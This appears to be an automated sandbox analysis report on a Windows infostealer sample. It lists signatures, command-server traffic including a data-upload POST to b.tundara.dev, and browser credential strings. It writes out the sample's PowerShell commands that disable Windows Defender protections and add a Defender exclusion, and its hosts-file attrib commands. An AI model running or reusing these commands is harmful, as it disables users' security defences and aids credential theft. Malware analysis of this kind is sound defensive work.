Windows Analysis Report
DmI602ZFyp.exe

Overview

General Information

Sample name:	DmI602ZFyp.exe renamed because original name is a hash value
Original sample name:	3b5fd2faa64b735197087df255850740bf87a2f7ee1f7ede61ff7bec4f04d89f.exe
Analysis ID:	1563093
MD5:	b719f5289acdec0fe628bf670e5b0996
SHA1:	8ea3332a38ec88aae2a77b463cc4eac8631e3912
SHA256:	3b5fd2faa64b735197087df255850740bf87a2f7ee1f7ede61ff7bec4f04d89f
Tags:	51-210-106-44exeuser-JAMESWT_MHT
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies the hosts file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Tries to harvest and steal browser information (history, passwords, etc)

Uses cmd line tools excessively to alter registry or file data

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: DmI602ZFyp.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: DmI602ZFyp.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ws?id=ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi0zMDk5LTlDMEUtQzE5Qi0yQTIzRUExRkM0MjA= HTTP/1.1Host: w.tundara.devUser-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: +ImwcL8yNRirG18BIv31hQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: b.tundara.dev
Source: global traffic	DNS traffic detected: DNS query: w.tundara.dev

Source: unknown

HTTP traffic detected: POST /tapped/66d82f8e-64e7-4a18-aa38-b985b61ff00d/ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi0zMDk5LTlDMEUtQzE5Qi0yQTIzRUExRkM0MjA= HTTP/1.1Host: b.tundara.devUser-Agent: Go-http-client/1.1Content-Length: 574Content-Type: multipart/form-data; boundary=7d41525b79902bc65c72991aefe4d247b0f90ac16eb4354ff334c78dc83eAccept-Encoding: gzip

Source: powershell.exe, 00000008.00000002.2428058504.00000197D68E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: DmI602ZFyp.exe	String found in binary or memory: http://dejavu.sourceforge.net
Source: DmI602ZFyp.exe	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: DmI602ZFyp.exe	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: DmI602ZFyp.exe	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: DmI602ZFyp.exe	String found in binary or memory: http://emojione.com/licensingColor
Source: DmI602ZFyp.exe	String found in binary or memory: http://emojione.comEmojiOne
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ip-api.com/json/DestroyEnvironmentBlock
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://s.symcd.com0_
Source: powershell.exe, 00000008.00000002.2427908012.00000197D67D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mic;i
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://sw.symcd.com0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001845000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C00173E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: DmI602ZFyp.exe, 00000000.00000002.2583628469.000000C000456000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://b.tundara.dev/tapped/66d82f8e-64e7-4a18-aa38-b985b61ff00d/ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00180E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/rpa0)
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://discord.com/api/v8/guilds/expected
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://discord.gg/tls:
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001848000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001848000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/pr
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00180C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: DmI602ZFyp.exe, 00000000.00000002.2583628469.000000C000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D20000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C00173E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001002000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811

Creates a DirectInput object (often for capturing keystrokes)

Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F5820000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: DirectInput8Create

memstr_390e64ad-c

Installs a global mouse hook

Source: C:\Users\user\Desktop\DmI602ZFyp.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33EE5FF2	8_2_00007FFD33EE5FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33EE5B7F	8_2_00007FFD33EE5B7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33EE8AF2	8_2_00007FFD33EE8AF2

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03

Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DmI602ZFyp.exe, 00000000.00000002.2601784413.000001857E833000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2602350132.000001857F2C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: DmI602ZFyp.exe	String found in binary or memory: C:/Users/Tundara/go/pkg/mod/fyne.io/fyne/v2@v2.5.2/internal/metadata/load.go
Source: DmI602ZFyp.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go

Source: unknown	Process created: C:\Users\user\Desktop\DmI602ZFyp.exe "C:\Users\user\Desktop\DmI602ZFyp.exe"
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DmI602ZFyp.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DmI602ZFyp.exe	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID	Jump to behavior

Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: xinput1_4.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: inputhost.dll	Jump to behavior
